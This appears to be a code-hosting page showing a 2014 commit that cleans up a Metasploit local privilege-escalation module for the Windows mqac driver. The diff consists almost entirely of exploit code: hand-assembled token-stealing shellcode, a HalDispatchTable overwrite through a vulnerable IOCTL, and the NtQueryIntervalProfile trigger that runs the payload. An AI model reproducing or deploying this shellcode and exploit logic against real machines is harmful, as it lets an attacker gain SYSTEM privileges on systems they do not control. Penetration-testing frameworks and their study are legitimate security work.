Clean up the mqac escalation module

bug/bundler_fix
Spencer McIntyre 2014-07-22 10:39:34 -04:00
parent da4eb0e08f
commit 6a545c2642
1 changed files with 11 additions and 15 deletions

View File

@ -138,34 +138,30 @@ class Metasploit3 < Msf::Exploit::Local
halDispatchTable += kernel_info[0] halDispatchTable += kernel_info[0]
print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}") print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}")
halbase = find_sys_base("hal.dll")[0] tokenstealing = "\x31\xc0"
haliQuerySystemInformation = halbase + mytarget['HaliQuerySystemInfo'] tokenstealing << "\x52"
halpSetSystemInformation = halbase + mytarget['HalpSetSystemInformation']
print_status("HaliQuerySystemInformation Address: 0x#{haliQuerySystemInformation.to_s(16)}")
print_status("HalpSetSystemInformation Address: 0x#{halpSetSystemInformation.to_s(16)}")
tokenstealing = "\x52"
tokenstealing << "\x53" tokenstealing << "\x53"
tokenstealing << "\x33\xc0" tokenstealing << "\x33\xc0"
tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00" tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"
tokenstealing << "\x8b\x40" + mytarget['_KPROCESS'] tokenstealing << "\x8b\x40" + target['_KPROCESS']
tokenstealing << "\x8b\xc8" tokenstealing << "\x8b\xc8"
tokenstealing << "\x8b\x98" + mytarget['_TOKEN'] + "\x00\x00\x00" tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00"
tokenstealing << "\x89\x1d\x00\x09\x02\x00" tokenstealing << "\x89\x1d\x00\x09\x02\x00"
tokenstealing << "\x8b\x80" + mytarget['_APLINKS'] + "\x00\x00\x00" tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00"
tokenstealing << "\x81\xe8" + mytarget['_APLINKS'] + "\x00\x00\x00" tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"
tokenstealing << "\x81\xb8" + mytarget['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00"
tokenstealing << "\x75\xe8" tokenstealing << "\x75\xe8"
tokenstealing << "\x8b\x90" + mytarget['_TOKEN'] + "\x00\x00\x00" tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"
tokenstealing << "\x8b\xc1" tokenstealing << "\x8b\xc1"
tokenstealing << "\x89\x90" + mytarget['_TOKEN'] + "\x00\x00\x00" tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00"
tokenstealing << "\x5b" tokenstealing << "\x5b"
tokenstealing << "\x5a" tokenstealing << "\x5a"
tokenstealing << "\xc2\x10" tokenstealing << "\xc2\x10"
shellcode = make_nops(0x200) + restore_ptrs + tokenstealing shellcode = make_nops(0x200) + tokenstealing
this_proc.memory.write(0x1, shellcode) this_proc.memory.write(0x1, shellcode)
print_status("Triggering vulnerable IOCTL")
session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0) session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)
result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4) result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)